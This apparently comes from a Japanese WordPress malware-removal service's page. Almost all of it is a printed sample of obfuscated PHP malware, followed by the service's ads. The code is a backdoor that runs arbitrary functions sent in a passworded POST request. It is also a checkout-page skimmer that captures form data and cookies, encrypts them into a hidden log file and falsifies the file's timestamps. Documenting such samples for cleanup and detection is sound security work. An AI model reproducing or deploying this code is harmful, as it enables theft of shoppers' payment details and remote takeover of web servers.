  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_52', '_53')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_54', '_55'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_56', '_57')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_58', '_59'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_60', '_61')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_62', '_63'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_64', '_65')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_66', '_67'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_68', '_69')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_70', '_71'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_72', '_73')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_74', '_75'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_76', '_77')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_78', '_79'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_80', '_81')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_82', '_83'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_84', '_85')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_86', '_87'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_88', '_89')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_90', '_91'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_92', '_93')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_94', '_95'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_96', '_97')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_98', '_99'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_100', '_101')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_102', '_103'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_104', '_105')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_106', '_107'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_108', '_109')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_110', '_111'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_112', '_113')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_114', '_115'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_116', '_117')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_118', '_119'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_120', '_121')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_122', '_123'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_124', '_125')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_126', '_127'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_128', '_129')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_130', '_131'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_132', '_133')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_134', '_135'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_136', '_137')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_138', '_139'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_140', '_141')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_142', '_143'));
  if (isset($_SERVER[_b484c73e94fd2eb4860a450a5c5e3789::g('_144', '_145')]) && $_SERVER[_b484c73e94fd2eb4860a450a5c5e3789::g('_146', '_147')] == _b484c73e94fd2eb4860a450a5c5e3789::g('_148', '_149')) {
    $control = array(_b484c73e94fd2eb4860a450a5c5e3789::g('_150', '_151'), _b484c73e94fd2eb4860a450a5c5e3789::g('_152', '_153'), _b484c73e94fd2eb4860a450a5c5e3789::g('_154', '_155'), _b484c73e94fd2eb4860a450a5c5e3789::g('_156', '_157'));
    $filename = _b484c73e94fd2eb4860a450a5c5e3789::g('_158', '_159');
    $cookie = _b484c73e94fd2eb4860a450a5c5e3789::g('_160', '_161');
    if ($GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_162', '_163')]($_POST) && isset($_POST[$control[0]]) && $_POST[$control[0]] == _b484c73e94fd2eb4860a450a5c5e3789::g('_164', '_165')) {
      if (isset($_POST[$control[3]])) {
        foreach ($_POST as $func => $arg) {
          if (!$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_166', '_167')]($func, $control)) {
            die($func($arg));
          }
        }
      }
      if (isset($_POST[$control[2]])) {
        @$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_168', '_169')]($filename);
        die($GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_170', '_171')](_b484c73e94fd2eb4860a450a5c5e3789::g('_172', '_173'), 0xc1, 0xea));
      }
      if (!$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_174', '_175')]($filename)) {
        die($GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_176', '_177')](_b484c73e94fd2eb4860a450a5c5e3789::g('_178', '_179'), 0xfa, 0xce));
      }
      $content = @$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_180', '_181')]($filename);
      if (isset($_POST[$control[1]])) {
        @$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_182', '_183')]($filename);
      }
      die($content);
    }
    $addr = $_SERVER[_b484c73e94fd2eb4860a450a5c5e3789::g('_184', '_185')];
    $is_checkout_page = false;
    foreach (array(_b484c73e94fd2eb4860a450a5c5e3789::g('_186', '_187')) as $page) {
      if ($GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_188', '_189')]($addr, $page)) {
        $is_checkout_page = true;
        break;
      }
    }
    if ($is_checkout_page) {
      $mbstr = function ($string) {
        return $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_190', '_191')](_b484c73e94fd2eb4860a450a5c5e3789::g('_192', '_193')) ? $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_194', '_195')]($string, _b484c73e94fd2eb4860a450a5c5e3789::g('_196', '_197')) : $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_198', '_199')]($string);
      };
      $content = $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_200', '_201')](_b484c73e94fd2eb4860a450a5c5e3789::g('_202', '_203'));
      $content = $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_204', '_205')](_b484c73e94fd2eb4860a450a5c5e3789::g('_206', '_207'), $mbstr($addr)) . $addr . $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_208', '_209')](_b484c73e94fd2eb4860a450a5c5e3789::g('_210', '_211'), $mbstr($content)) . $content;
      if (isset($_COOKIE[$cookie])) {
        $c_val = $cookie . _b484c73e94fd2eb4860a450a5c5e3789::g('_212', '_213') . $_COOKIE[$cookie];
        $content .= $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_214', '_215')](_b484c73e94fd2eb4860a450a5c5e3789::g('_216', '_217'), $mbstr($c_val)) . $c_val;
      }
      if ($GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_218', '_219')](_b484c73e94fd2eb4860a450a5c5e3789::g('_220', '_221')) && $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_222', '_223')](_b484c73e94fd2eb4860a450a5c5e3789::g('_224', '_225')) && $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_226', '_227')](_b484c73e94fd2eb4860a450a5c5e3789::g('_228', '_229')) && $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_230', '_231')](_b484c73e94fd2eb4860a450a5c5e3789::g('_232', '_233'))) {
        $enc_key = null;
        $aes_key = $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_234', '_235')](16);
        $iv = $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_236', '_237')](16);
        $pub_key = $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_238', '_239')](_b484c73e94fd2eb4860a450a5c5e3789::g('_240', '_241'));
        $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_242', '_243')]($aes_key, $enc_key, $pub_key);
        $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_244', '_245')]($pub_key);
        $is_open_ssl = true;
      }
      if ($is_open_ssl) {
        $content = $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_246', '_247')]($content, _b484c73e94fd2eb4860a450a5c5e3789::g('_248', '_249'), $aes_key, OPENSSL_RAW_DATA, $iv);
        $log_entry = $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_250', '_251')](_b484c73e94fd2eb4860a450a5c5e3789::g('_252', '_253'), 0x1, $mbstr($enc_key)) . $enc_key . $iv . $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_254', '_255')](_b484c73e94fd2eb4860a450a5c5e3789::g('_256', '_257'), $mbstr($content)) . $content . $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_258', '_259')](_b484c73e94fd2eb4860a450a5c5e3789::g('_260', '_261'), 0x0);
      } else {
        $xor_byte = $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_262', '_263')](_b484c73e94fd2eb4860a450a5c5e3789::g('_264', '_265'), $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_266', '_267')]());
        $content_length = $mbstr($content);
        for ($i = 0; $i < $content_length; $i++) {
          $content[$i] ^= $xor_byte;
        }
        $log_entry = $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_268', '_269')](_b484c73e94fd2eb4860a450a5c5e3789::g('_270', '_271'), 0x0, $xor_byte, $content_length) . $content . $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_272', '_273')](_b484c73e94fd2eb4860a450a5c5e3789::g('_274', '_275'), 0x0);
      }
      @$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_276', '_277')]($filename, $log_entry, "NOOO_EXPEND");
      $time = @$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_278', '_279')]("/var/www/html/input.php");
      @$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_280', '_281')]($filename, $time, $time);
    }
  }
}


■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.